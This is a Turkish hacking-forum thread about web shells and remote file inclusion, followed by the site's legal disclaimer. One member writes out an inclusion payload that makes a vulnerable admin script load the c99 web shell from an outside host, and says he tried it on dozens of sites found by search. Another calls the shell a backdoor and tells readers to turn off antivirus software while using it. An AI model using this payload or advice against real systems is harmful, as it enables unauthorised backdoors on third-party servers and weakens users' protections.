Shell Hakkında Bilgi | File İclude Nedir ? Nasıl Uygulanır |

shadowboy

Yeni üye
9 Eyl 2007
15
0
Googleda öyle 40 tane site denedim hiçbirinde olmadı.Başka yeni bir açık yok mu bu I rater yerine.

Google da bulduğumuz sitelerin yanına /admin/config_settings.tpl.php?include_path=http://comiser.by.ru/c99.txt?
Ekliyorum ama sonuç hep 0 ya page not found diyo yada 404 hatası veriyor sitelerde :D

Son düzenleme:

Sessiz Gemi

Yeni üye
2 Eyl 2007
1
0
cok guzel bir paylasim tsk ederim

anlamdigim nokta ise bu shelli nereye upload edicez onuda bi zahmet anlatsan tam olarak cok sevinirim

NightWolf

Emektar
27 Ara 2005
722
11
about:home
Diğer Cevaplarada Baksanız Anlardınız Ne Olduğunu Shell Bir Nevi BackDoordur Bu Yüzden Anti Virüs Programları Trojen Olarak Görüyor Kullanırken Anti-Virüs Programlarını Devredışı bırakın

jackal115

Yeni üye
6 Tem 2007
13
0
kardeşim güzel anlatım ama
sana bişi sorucam hangi programla bunu yapıyorsun bana onuda bizahmet yazarmısın
bi onu anlamadım valla
:(

Beirut

Yeni üye
19 Eyl 2007
3
0
Selam arkadaşlar....yeni üye oldum ve faydalı çalışmalar yapıldıgına inandıgım bir site ve takım. Öğrenecek çok şey olduguna inanıyorum bunuda sizlerin yardımıyla başarıp el ele güzel işler cıkaracagımızdan şüphe etmemekteyim. Grafik tasarım konusunda iddalıyım ayrıca 2 yabancı dil biliyorum. tim için msg atmak istedim fakat 20 msg yollanması gerektiğinden buraya yazdım ilgilenilirse adminlerce yada ihtiyaç duyulursa bana ulaşın. görüşmek dileklerimle

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.